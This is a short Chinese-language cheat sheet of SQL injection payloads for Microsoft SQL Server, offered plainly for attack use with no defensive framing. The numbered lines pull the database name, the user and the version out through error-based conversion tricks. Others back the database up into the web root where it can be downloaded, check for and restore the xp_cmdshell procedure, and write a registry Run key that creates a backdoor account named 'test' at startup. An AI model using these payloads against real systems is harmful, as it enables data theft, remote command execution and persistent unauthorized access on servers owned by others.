1、返回的是連接的數據庫名:
and db_name()>0
2、獲取連接用戶名:
and user>0
3、將數據庫備份到Web目錄下面:
;backup database 數據庫名 to disk='c:\inetpub\wwwroot\1.db';--
4、顯示SQL系統版本:
and 1=(select @@VERSION) 或and 1=convert(int,@@version)--
5、判斷xp_cmdshell擴展存儲過程是否存在:
and 1=(SELECT count(*) FROM master.dbo.sysobjects WHERE xtype = 'X' AND name ='xp_cmdshell')
6、恢復xp_cmdshell擴展存儲的命令:
;exec master.dbo.sp_addextendedproc 'xp_cmdshell','e:\inetput\web\xplog70.dll';--
7、向啟動組中寫入命令行和執行程序:
;EXEC master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\
Run','help1','REG_SZ','cmd.exe /c net user test ptlove /add'
8、查看當前的數據庫名稱:
and 0 <> db_name(n) n改成0,1,2,3……就可以跨庫了 或and 1=convert(int,db_name())--
